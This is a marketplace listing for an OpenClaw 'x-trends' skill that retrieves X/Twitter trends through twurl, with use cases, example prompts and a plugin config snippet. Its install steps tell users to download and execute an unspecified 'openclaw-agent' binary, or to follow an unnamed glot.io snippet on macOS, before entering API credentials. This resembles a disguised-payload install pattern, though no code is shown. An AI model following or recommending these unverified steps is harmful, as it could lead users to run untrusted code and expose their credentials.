x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
Why use this skill?
Analyze real-time X (Twitter) trends, track viral hashtags, and monitor global conversations with the powerful x-trends skill for OpenClaw. Install today.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/x-trends-orwhpWhat This Skill Does
The x-trends skill provides OpenClaw agents with the capability to interface with X (formerly Twitter) to retrieve real-time data on viral topics, hashtags, and regional trends. By leveraging the openclaw-agent utility alongside the twurl CLI tool, this skill enables users to monitor global conversations, track the velocity of specific hashtags, and analyze geographic-specific content. It bridges the gap between raw API data and actionable insights, allowing users to programmatically fetch, filter, and parse Twitter metadata directly through their agent's command interface.
Installation
To utilize this skill, ensure you have the openclaw-agent installed and running. For Windows, download the official release, extract it, and execute the binary. For macOS, follow the instructions via the provided glot.io snippet. Once the daemon is active, install the twurl gem via gem install twurl and perform the OAuth handshake using your developer API credentials. Finally, run the installation command: clawhub install openclaw/skills/skills/hightower6eu/x-trends-orwhp.
Use Cases
- Market Research: Monitor trending hashtags in specific countries to identify emerging consumer interests or competitor buzz.
- Content Curation: Quickly find trending media-rich tweets for news aggregation or social media management.
- Sentiment Monitoring: Track the volume of global discussions on specific geopolitical or cultural topics using real-time search queries.
- Localization: Analyze trends in different regions using WOEID (Where On Earth ID) mapping to tailor content strategy for international audiences.
Example Prompts
- "Check what the top 5 trending topics are in Japan right now and provide a brief summary of each."
- "Search for the latest 10 tweets mentioning #OpenAI that include media and output them in a list."
- "What is the current WOEID for the UK and can you list the top 10 trends for that location?"
Tips & Limitations
- Rate Limiting: Twitter API v1.1 imposes a limit of 75 requests per 15 minutes for trend data; be mindful of this when automating queries.
- Dependency Management: Always verify that the
openclaw-agentis actively running in the background before issuing commands, as the skill cannot establish a connection to X without the bridge. - Data Handling: Utilize
jqfor efficient data filtering. If a trend lackstweet_volume, do not assume the topic is irrelevant; it simply means the data point is unavailable via the current API response. Always prioritize official documentation for valid query parameters to avoid request failures.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-x-trends-orwhp": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.